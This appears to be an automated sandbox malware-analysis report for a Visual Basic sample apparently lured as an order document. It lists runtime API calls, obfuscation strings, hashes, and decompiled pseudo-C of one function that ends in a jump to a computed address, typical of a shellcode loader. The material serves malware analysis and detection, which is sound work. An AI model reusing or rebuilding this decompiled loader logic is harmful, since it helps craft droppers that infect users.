__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA88,000000F0,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410EAA
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410ED1
__vbaObjSet.MSVBVM60(?,00000000,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410F0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DB74,000000A0,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410F5A
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410F81
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 00410FBD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D96C,00000158,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0,?), ref: 0041100A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,00000704,?,0057F7D0,00000000,?,?,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?), ref: 0041109D
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,?,0057F7D0,00000000,?,?,?,?,?,?,001ADAD5,AFDELINGSCHEFERS,?,0057F7D0), ref: 004110C1
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 004110E7
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411152
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041118E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,000001C0), ref: 004111DB
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411202
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041123E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D96C,000000F8), ref: 0041128B
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004112B0
__vbaI4Var.MSVBVM60(00000000), ref: 004112B9
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,0040DE54,00416010,?,0040DE54,00416010), ref: 004112EA
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00411306
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DE54,00416010), ref: 00411314
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411333
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041136F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DB74,00000150), ref: 004113BC
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004113E3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041141F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DAB8,000002A8), ref: 0041146C
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004114BB
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004114D3
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004114F5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411531
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA98,00000068), ref: 00411578
__vbaFreeObj.MSVBVM60 ref: 004115D6
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004115F5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411631
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000190), ref: 0041167E
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004116A5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004116E1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA88,000000D0), ref: 0041172E
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00411753
__vbaI4Var.MSVBVM60(?,chaccon,Audiometry,?), ref: 00411793
__vbaHresultCheckObj.MSVBVM60(?,?,0040D260,00000704,?,00000000,?,chaccon,Audiometry,?), ref: 004117E0
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041180B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,0040DE54,00416010,?,?,?,?,0040DE54,00416010), ref: 00411819
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411838
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411874
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA50,00000068), ref: 004118BB
__vbaFreeObj.MSVBVM60 ref: 0041192E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D230,000002B4), ref: 004119CB

Strings

Tudemikkel, xrefs: 00410A4C
ANTNDELSEN, xrefs: 004108A9
dcA, xrefs: 0040FCE3
ALUMIUM, xrefs: 004105E9
5D, xrefs: 00411B8C
1N, xrefs: 00411110, 00411116
*, xrefs: 004125BA
Haandbremser6, xrefs: 004112D1
chaccon, xrefs: 00411787
aQ, xrefs: 00411598
Zubeneschamali, xrefs: 004105E4
AFDELINGSCHEFERS, xrefs: 00410CD4
Audiometry, xrefs: 00411782
dcA, xrefs: 0040FDF1
@B0%, xrefs: 0041102A
dcA, xrefs: 0040F934

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$New2$List$CallErrorLate$ChkstkMove$AnsiSystem$#531#554#568#611
String ID: *$5D$@B0%$AFDELINGSCHEFERS$ALUMIUM$ANTNDELSEN$Audiometry$Haandbremser6$Tudemikkel$Zubeneschamali$aQ$chaccon$dcA$dcA$dcA$1N
API String ID: 1479439471-1073206757
Opcode ID: 67f0b8e34d47853cf6a4c22e1261e7f6037cc0f43d54427f77b301b0c454f8e2
Instruction ID: 8dd655f31b138ec127f5f94a1bd1adadf35c7e42a9befe1fb7985485b6040f0d
Opcode Fuzzy Hash: 67f0b8e34d47853cf6a4c22e1261e7f6037cc0f43d54427f77b301b0c454f8e2
Instruction Fuzzy Hash: 9C43DC75940229AFDB21EF50CC49BD9B7B4BB48304F1041EAE10ABB2A1DB759EC4DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00411A00, Relevance: 89.9, APIs: 49, Strings: 2, Instructions: 635
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00411A00() {
				signed int _t349;
				signed int _t353;
				intOrPtr _t357;
				signed int _t361;
				signed int _t366;
				signed int _t372;
				signed int _t376;
				intOrPtr _t380;
				signed int _t384;
				signed int _t388;
				signed int _t392;
				signed int _t396;
				signed int _t400;
				intOrPtr _t404;
				signed int _t408;
				signed int _t420;
				signed int _t430;
				signed int _t434;
				intOrPtr _t439;
				signed int _t443;
				void* _t446;
				signed int _t458;
				signed int _t462;
				signed int _t466;
				intOrPtr _t470;
				signed int _t474;
				signed int _t478;
				signed int _t482;
				signed int _t487;
				intOrPtr _t498;
				intOrPtr _t514;
				intOrPtr _t530;
				void* _t532;
				intOrPtr* _t533;
				long long* _t534;
				void* _t535;
				void* _t536;
				intOrPtr* _t537;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t532 - 0x24)) =  *((intOrPtr*)(_t532 - 0x24)) +  *((intOrPtr*)(_t532 - 0x388));
					if( *((intOrPtr*)(_t532 - 0x24)) >  *((intOrPtr*)(_t532 - 0x38c))) {
						break;
					}
					L2:
					 *((intOrPtr*)(_t532 - 4)) = 0x24;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4d8)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4d8)) = 0x416010;
					}
					_t349 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t349;
					_t353 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0xf8))( *(_t532 - 0x2d4), _t532 - 0x294, _t349,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4d8)))))) + 0x374))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4d8))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t353;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x4dc) =  *(_t532 - 0x4dc) & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x40da78);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x4dc) = _t353;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4e0)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4e0)) = 0x416010;
					}
					_t498 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4e0))))));
					_t357 = _t532 - 0x204;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t357;
					_t361 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0x148))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x1f4, _t357,  *((intOrPtr*)(_t498 + 0x31c))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4e0))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t361;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x4e4) =  *(_t532 - 0x4e4) & 0x00000000;
					} else {
						_push(0x148);
						_push(0x40dbd4);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x4e4) = _t361;
					}
					 *((intOrPtr*)(_t532 - 0x2b0)) = 0x8374d8;
					 *((short*)(_t532 - 0x298)) = 0x4435;
					 *_t533 =  *0x4012f8;
					_t366 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x70c))( *((intOrPtr*)(_t532 + 8)),  *((intOrPtr*)(_t532 - 0x294)), _t498, _t532 - 0x298, 0x66936e, _t532 - 0x2b0, 0x26f06a,  *((intOrPtr*)(_t532 - 0x1f4)));
					 *(_t532 - 0x2e4) = _t366;
					if( *(_t532 - 0x2e4) >= 0) {
						 *(_t532 - 0x4e8) =  *(_t532 - 0x4e8) & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2e4));
						L00401558();
						 *(_t532 - 0x4e8) = _t366;
					}
					L00401528();
					_push(_t532 - 0x204);
					_push(_t532 - 0x200);
					_push(2);
					L00401546();
					_t534 = _t533 + 0xc;
					 *((intOrPtr*)(_t532 - 4)) = 0x25;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4ec)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4ec)) = 0x416010;
					}
					_t372 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t372;
					_t376 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0x60))( *(_t532 - 0x2d4), _t532 - 0x2b0, _t372,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4ec)))))) + 0x358))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4ec))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t376;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x4f0) =  *(_t532 - 0x4f0) & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40d96c);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x4f0) = _t376;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4f4)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4f4)) = 0x416010;
					}
					_t380 = _t532 - 0x204;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t380;
					_t384 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0xa8))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x294, _t380,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4f4)))))) + 0x32c))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4f4))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t384;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x4f8) =  *(_t532 - 0x4f8) & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x40dbe4);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x4f8) = _t384;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x4fc)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x4fc)) = 0x416010;
					}
					_t388 = _t532 - 0x208;
					L0040154C();
					 *(_t532 - 0x2e4) = _t388;
					_t392 =  *((intOrPtr*)( *( *(_t532 - 0x2e4)) + 0xb0))( *(_t532 - 0x2e4), _t532 - 0x298, _t388,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4fc)))))) + 0x344))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x4fc))))));
					asm("fclex");
					 *(_t532 - 0x2e8) = _t392;
					if( *(_t532 - 0x2e8) >= 0) {
						 *(_t532 - 0x500) =  *(_t532 - 0x500) & 0x00000000;
					} else {
						_push(0xb0);
						_push(0x40da88);
						_push( *(_t532 - 0x2e4));
						_push( *(_t532 - 0x2e8));
						L00401558();
						 *(_t532 - 0x500) = _t392;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x504)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x504)) = 0x416010;
					}
					_t396 = _t532 - 0x20c;
					L0040154C();
					 *(_t532 - 0x2ec) = _t396;
					_t400 =  *((intOrPtr*)( *( *(_t532 - 0x2ec)) + 0x68))( *(_t532 - 0x2ec), _t532 - 0x2b4, _t396,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x504)))))) + 0x388))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x504))))));
					asm("fclex");
					 *(_t532 - 0x2f0) = _t400;
					if( *(_t532 - 0x2f0) >= 0) {
						 *(_t532 - 0x508) =  *(_t532 - 0x508) & 0x00000000;
					} else {
						_push(0x68);
						_push(0x40dbf4);
						_push( *(_t532 - 0x2ec));
						_push( *(_t532 - 0x2f0));
						L00401558();
						 *(_t532 - 0x508) = _t400;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x50c)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x50c)) = 0x416010;
					}
					_t514 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x50c))))));
					_t404 = _t532 - 0x210;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2f4)) = _t404;
					_t408 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2f4)))) + 0x98))( *((intOrPtr*)(_t532 - 0x2f4)), _t532 - 0x29c, _t404,  *((intOrPtr*)(_t514 + 0x334))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x50c))))));
					asm("fclex");
					 *(_t532 - 0x2f8) = _t408;
					if( *(_t532 - 0x2f8) >= 0) {
						 *(_t532 - 0x510) =  *(_t532 - 0x510) & 0x00000000;
					} else {
						_push(0x98);
						_push(0x40da68);
						_push( *((intOrPtr*)(_t532 - 0x2f4)));
						_push( *(_t532 - 0x2f8));
						L00401558();
						 *(_t532 - 0x510) = _t408;
					}
					 *((short*)(_t532 - 0x2a8)) =  *((intOrPtr*)(_t532 - 0x29c));
					 *((short*)(_t532 - 0x2a4)) =  *((intOrPtr*)(_t532 - 0x298));
					 *((short*)(_t532 - 0x2a0)) =  *((intOrPtr*)(_t532 - 0x294));
					 *((intOrPtr*)(_t532 - 0x2b8)) =  *((intOrPtr*)(_t532 - 0x2b0));
					 *_t534 =  *((intOrPtr*)(_t532 - 0x2b4));
					 *_t534 =  *0x4012f0;
					_t420 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x6fc))( *((intOrPtr*)(_t532 + 8)), _t514, _t514, _t532 - 0x2b8, _t532 - 0x2a0, _t532 - 0x2a4, _t514, _t532 - 0x2a8, _t532 - 0x2ac);
					 *(_t532 - 0x2fc) = _t420;
					if( *(_t532 - 0x2fc) >= 0) {
						 *(_t532 - 0x514) =  *(_t532 - 0x514) & 0x00000000;
					} else {
						_push(0x6fc);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2fc));
						L00401558();
						 *(_t532 - 0x514) = _t420;
					}
					 *((short*)(_t532 - 0x148)) =  *((intOrPtr*)(_t532 - 0x2ac));
					_push(_t532 - 0x210);
					_push(_t532 - 0x20c);
					_push(_t532 - 0x208);
					_push(_t532 - 0x204);
					_push(_t532 - 0x200);
					_push(5);
					L00401546();
					_t535 = _t534 + 0x18;
					 *((intOrPtr*)(_t532 - 4)) = 0x26;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x518)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x518)) = 0x416010;
					}
					_t430 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t430;
					_t434 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0xd0))( *(_t532 - 0x2d4), _t532 - 0x204, _t430,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x518)))))) + 0x308))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x518))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t434;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x51c) =  *(_t532 - 0x51c) & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x40da88);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x51c) = _t434;
					}
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t532 - 0x204)));
					_push(_t532 - 0x220);
					L00401522();
					_t536 = _t535 + 0x10;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x520)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x520)) = 0x416010;
					}
					_t439 = _t532 - 0x208;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t439;
					_t443 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0x78))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x2b0, _t439,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x520)))))) + 0x2fc))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x520))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t443;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x524) =  *(_t532 - 0x524) & 0x00000000;
					} else {
						_push(0x78);
						_push(0x40daa8);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x524) = _t443;
					}
					 *((intOrPtr*)(_t532 - 0x2b4)) =  *((intOrPtr*)(_t532 - 0x2b0));
					 *((long long*)(_t532 - 0x2c8)) =  *0x4012e8;
					_t446 = _t532 - 0x220;
					L0040151C();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x718))( *((intOrPtr*)(_t532 + 8)), _t532 - 0x2c8, _t446, _t446, _t532 - 0x2b4, _t532 - 0x2d0);
					 *((intOrPtr*)(_t532 - 0x158)) =  *((intOrPtr*)(_t532 - 0x2d0));
					 *((intOrPtr*)(_t532 - 0x154)) =  *((intOrPtr*)(_t532 - 0x2cc));
					L00401546();
					_t537 = _t536 + 0x10;
					L00401516();
					 *((intOrPtr*)(_t532 - 4)) = 0x27;
					_t458 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x708))( *((intOrPtr*)(_t532 + 8)), 3, _t532 - 0x200, _t532 - 0x208, _t532 - 0x204);
					 *(_t532 - 0x2d4) = _t458;
					if( *(_t532 - 0x2d4) >= 0) {
						 *(_t532 - 0x528) =  *(_t532 - 0x528) & 0x00000000;
					} else {
						_push(0x708);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2d4));
						L00401558();
						 *(_t532 - 0x528) = _t458;
					}
					 *((intOrPtr*)(_t532 - 4)) = 0x28;
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x52c)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x52c)) = 0x416010;
					}
					_t462 = _t532 - 0x200;
					L0040154C();
					 *(_t532 - 0x2d4) = _t462;
					_t466 =  *((intOrPtr*)( *( *(_t532 - 0x2d4)) + 0x148))( *(_t532 - 0x2d4), _t532 - 0x294, _t462,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x52c)))))) + 0x398))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x52c))))));
					asm("fclex");
					 *(_t532 - 0x2d8) = _t466;
					if( *(_t532 - 0x2d8) >= 0) {
						 *(_t532 - 0x530) =  *(_t532 - 0x530) & 0x00000000;
					} else {
						_push(0x148);
						_push(0x40dab8);
						_push( *(_t532 - 0x2d4));
						_push( *(_t532 - 0x2d8));
						L00401558();
						 *(_t532 - 0x530) = _t466;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x534)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x534)) = 0x416010;
					}
					_t470 = _t532 - 0x204;
					L0040154C();
					 *((intOrPtr*)(_t532 - 0x2dc)) = _t470;
					_t474 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x2dc)))) + 0x70))( *((intOrPtr*)(_t532 - 0x2dc)), _t532 - 0x1f4, _t470,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x534)))))) + 0x300))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x534))))));
					asm("fclex");
					 *(_t532 - 0x2e0) = _t474;
					if( *(_t532 - 0x2e0) >= 0) {
						 *(_t532 - 0x538) =  *(_t532 - 0x538) & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40dc04);
						_push( *((intOrPtr*)(_t532 - 0x2dc)));
						_push( *(_t532 - 0x2e0));
						L00401558();
						 *(_t532 - 0x538) = _t474;
					}
					if( *0x416010 != 0) {
						 *((intOrPtr*)(_t532 - 0x53c)) = 0x416010;
					} else {
						_push(0x416010);
						_push(0x40de54);
						L0040155E();
						 *((intOrPtr*)(_t532 - 0x53c)) = 0x416010;
					}
					_t530 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x53c))))));
					_t478 = _t532 - 0x208;
					L0040154C();
					 *(_t532 - 0x2e4) = _t478;
					_t482 =  *((intOrPtr*)( *( *(_t532 - 0x2e4)) + 0xe8))( *(_t532 - 0x2e4), 0, _t532 - 0x1f8, _t478,  *((intOrPtr*)(_t530 + 0x30c))( *((intOrPtr*)( *((intOrPtr*)(_t532 - 0x53c))))));
					asm("fclex");
					 *(_t532 - 0x2e8) = _t482;
					if( *(_t532 - 0x2e8) >= 0) {
						 *(_t532 - 0x540) =  *(_t532 - 0x540) & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x40dc14);
						_push( *(_t532 - 0x2e4));
						_push( *(_t532 - 0x2e8));
						L00401558();
						 *(_t532 - 0x540) = _t482;
					}
					 *((long long*)(_t532 - 0x2d0)) =  *0x4012e0;
					 *((intOrPtr*)(_t532 - 0x2c8)) = 0x33f4f430;
					 *((intOrPtr*)(_t532 - 0x2c4)) = 0x5b07;
					 *_t537 =  *0x4012d8;
					_t487 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t532 + 8)))) + 0x704))( *((intOrPtr*)(_t532 + 8)),  *((intOrPtr*)(_t532 - 0x294)), _t532 - 0x2c8, _t530, 0x39a8a8,  *((intOrPtr*)(_t532 - 0x1f4)),  *((intOrPtr*)(_t532 - 0x1f8)), _t532 - 0x2d0);
					 *(_t532 - 0x2ec) = _t487;
					if( *(_t532 - 0x2ec) >= 0) {
						 *(_t532 - 0x544) =  *(_t532 - 0x544) & 0x00000000;
					} else {
						_push(0x704);
						_push(0x40d260);
						_push( *((intOrPtr*)(_t532 + 8)));
						_push( *(_t532 - 0x2ec));
						L00401558();
						 *(_t532 - 0x544) = _t487;
					}
					L86:
					_push(_t532 - 0x1f8);
					_push(_t532 - 0x1f4);
					_push(2);
					L004014E6();
					_push(_t532 - 0x208);
					_push(_t532 - 0x204);
					_push(_t532 - 0x200);
					_push(3);
					L00401546();
					_t533 = _t537 + 0x1c;
					 *((intOrPtr*)(_t532 - 4)) = 0x29;
				}
				L87:
				 *((intOrPtr*)(_t532 - 4)) = 0x2a;
				 *((intOrPtr*)(_t532 - 0x248)) = 0x80020004;
				 *((intOrPtr*)(_t532 - 0x250)) = 0xa;
				 *((intOrPtr*)(_t532 - 0x238)) = 0x80020004;
				 *((intOrPtr*)(_t532 - 0x240)) = 0xa;
				 *((intOrPtr*)(_t532 - 0x228)) = 0x80020004;
				 *((intOrPtr*)(_t532 - 0x230)) = 0xa;
				 *((intOrPtr*)(_t532 - 0x218)) = 0xff;
				 *((intOrPtr*)(_t532 + 0x2fa)) = 0x400c89;
				 *((intOrPtr*)(_t532 + 0x2fa)) =  *((intOrPtr*)(_t532 + 0x2fa)) - 0xffffd508;
				_push( *((intOrPtr*)(_t532 + 0x2fa)));
				goto __edi;
			}

0x00411a00
0x00411a00
0x00411a00
0x00411a09
0x00411a15
0x00000000
0x00000000
0x00411a1b
0x00411a1b
0x00411a29
0x00411a46
0x00411a2b
0x00411a2b
0x00411a30
0x00411a35
0x00411a3a
0x00411a3a
0x00411a6a
0x00411a71
0x00411a76
0x00411a91
0x00411a97
0x00411a99
0x00411aa6
0x00411acb
0x00411aa8
0x00411aa8
0x00411aad
0x00411ab2
0x00411ab8
0x00411abe
0x00411ac3
0x00411ac3
0x00411ad9
0x00411af6
0x00411adb
0x00411adb
0x00411ae0
0x00411ae5
0x00411aea
0x00411aea
0x00411b10
0x00411b1a
0x00411b21
0x00411b26
0x00411b41
0x00411b47
0x00411b49
0x00411b56
0x00411b7b
0x00411b58
0x00411b58
0x00411b5d
0x00411b62
0x00411b68
0x00411b6e
0x00411b73
0x00411b73
0x00411b82
0x00411b8c
0x00411bba
0x00411bcb
0x00411bd1
0x00411bde
0x00411c00
0x00411be0
0x00411be0
0x00411be5
0x00411bea
0x00411bed
0x00411bf3
0x00411bf8
0x00411bf8
0x00411c0d
0x00411c18
0x00411c1f
0x00411c20
0x00411c22
0x00411c27
0x00411c2a
0x00411c38
0x00411c55
0x00411c3a
0x00411c3a
0x00411c3f
0x00411c44
0x00411c49
0x00411c49
0x00411c79
0x00411c80
0x00411c85
0x00411ca0
0x00411ca3
0x00411ca5
0x00411cb2
0x00411cd4
0x00411cb4
0x00411cb4
0x00411cb6
0x00411cbb
0x00411cc1
0x00411cc7
0x00411ccc
0x00411ccc
0x00411ce2
0x00411cff
0x00411ce4
0x00411ce4
0x00411ce9
0x00411cee
0x00411cf3
0x00411cf3
0x00411d23
0x00411d2a
0x00411d2f
0x00411d4a
0x00411d50
0x00411d52
0x00411d5f
0x00411d84
0x00411d61
0x00411d61
0x00411d66
0x00411d6b
0x00411d71
0x00411d77
0x00411d7c
0x00411d7c
0x00411d92
0x00411daf
0x00411d94
0x00411d94
0x00411d99
0x00411d9e
0x00411da3
0x00411da3
0x00411dd3
0x00411dda
0x00411ddf
0x00411dfa
0x00411e00
0x00411e02
0x00411e0f
0x00411e34
0x00411e11
0x00411e11
0x00411e16
0x00411e1b
0x00411e21
0x00411e27
0x00411e2c
0x00411e2c
0x00411e42
0x00411e5f
0x00411e44
0x00411e44
0x00411e49
0x00411e4e
0x00411e53
0x00411e53
0x00411e83
0x00411e8a
0x00411e8f
0x00411eaa
0x00411ead
0x00411eaf
